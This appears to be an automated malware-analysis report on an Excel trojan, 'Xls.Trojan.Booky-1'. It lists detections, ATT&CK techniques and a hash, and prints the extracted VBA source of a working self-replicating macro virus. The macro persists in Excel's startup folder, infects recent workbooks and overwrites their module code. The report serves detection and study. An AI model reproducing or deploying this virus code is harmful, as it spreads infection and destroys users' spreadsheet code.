MALICIOUS
Risk Score: 180

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1547.001 Registry Run Keys / Startup Folder
- T1566.001 Spearphishing Attachment
This Excel file contains a VBA macro with an Auto_Open subroutine, indicating it is designed to execute automatically upon opening. The macro attempts to save itself as 'Booky.xls' in the Excel startup path, suggesting an intent to infect other Excel files and establish persistence. The ClamAV detection name 'Xls.Trojan.Booky-1' further supports its classification as a malicious trojan.
Heuristics (3)
- ClamAV: Xls.Trojan.Booky-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Xls.Trojan.Booky-1
- VBA macros detected (medium, 1 related finding, OLE_VBA_MACROS): Document contains VBA macro code
- Auto_Open macro (high, OLE_VBA_AUTO): Auto_Open macro
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10107 bytes |

SHA-256: 7a81cef9d1f40618607754c3e09edd625a2271daea6dac643dd1ea753569e898
Detection: ClamAV: Xls.Trojan.Booky-1
Obfuscation or payload: unlikely

Preview script: first 1,000 lines of the extracted script
```vba
Attribute VB_Name = "booky"
Sub Auto_Open()
'My first Excel virus (semi-polymorphic)
'CoDeNaMe: XL/ Booky
'
'Full comment:
'check whether the PC is infected
On Error Resume Next
If Application.UserName <> "booky" Then
Application.UserName = "booky"
'if not, infect the PC
ActiveWorkbook.SaveAs FileName:=Application.StartupPath + "\Booky.xls", FileFormat:=xlNormal, Password:="", WriteResPassword:="", ReadOnlyRecommended:=False, CreateBackup:=False
StatusBar = "BookY RuLz Hir...Hehehe"
End If
'Infect 5 recent files if they have not already been infected
Dim inf, nr, ln, xxx, poly, a, modul
'Find which module is the original
For i = 1 To ActiveWorkbook.VBProject.VBComponents.Count
If ActiveWorkbook.VBProject.VBComponents(i).Name = "booky" Then modul = i
Next i
For i = 1 To Application.RecentFiles.Count
'open the file if it is not already open
If nr >= 5 Then i = Application.RecentFiles.Count
If Application.RecentFiles(i).Path <> ThisWorkbook.Path + "\" + ThisWorkbook.Name Then Workbooks.Open FileName:=Application.RecentFiles(i).Path
inf = 0
'find which module the virus code is in
For n = 1 To ActiveWorkbook.VBProject.VBComponents.Count
If ActiveWorkbook.VBProject.VBComponents(n).Name = "booky" Then inf = inf + 1
Next n
If inf > 0 Then ActiveWorkbook.Close
If inf = 0 Then
nr = nr + 1
ActiveWorkbook.VBProject.VBComponents.Add vbext_ct_StdModule
'infect all modules and create a new one, just in case!
For a = 1 To ActiveWorkbook.VBProject.VBComponents.Count
ActiveWorkbook.VBProject.VBComponents.Item(a).CodeModule.DeleteLines 1, ActiveWorkbook.VBProject.VBComponents.Item(a).CodeModule.CountOfLines
'copy the virus code + some polymorphism (random chars)
For ln = 1 To ThisWorkbook.VBProject.VBComponents(modul).CodeModule.CountOfLines
xxx = ThisWorkbook.VBProject.VBComponents(modul).CodeModule.Lines(ln, 1)
poly = Chr(Int((120 * Rnd) + 32)) + Chr(Int((120 * Rnd) + 32)) + Chr(Int((120 * Rnd) + 32)) + Chr(Int((120 * Rnd) + 32))
strn = xxx + " '" + poly
ActiveWorkbook.VBProject.VBComponents.Item(a).CodeModule.InsertLines ln, strn
Next ln
Next a
'name the new module "booky" (so it knows it has been infected)
ActiveWorkbook.VBProject.VBComponents(ActiveWorkbook.VBProject.VBComponents.Count).Name = "booky"
'save and close the file
ActiveWorkbook.Save
ActiveWorkbook.Close
End If
Next i
End Sub
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Processing file: /opt/analyzer/scan_staging/c2aec4aa84154486abcd866e5c277777.bin
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/booky - 8293 bytes
' Line #0:
' FuncDefn (Sub Auto_Open())
' Line #1:
' QuoteRem 0x0000 0x002B "Primul meu virus de ExCeL (semi polymorfic)"
' Line #2:
' QuoteRem 0x0000 0x0013 "CoDeNaMe: XL/ Booky"
' Line #3:
' QuoteRem 0x0000 0x0000 ""
' Line #4:
' QuoteRem 0x0000 0x000D "Full comment:"
' Line #5:
' QuoteRem 0x0000 0x001D "verifica daca e infect. PC-ul"
' Line #6:
' OnError (Resume Next)
' Line #7:
' Ld Application
' MemLd UserName
' LitStr 0x0005 "booky"
'
... (truncated)
```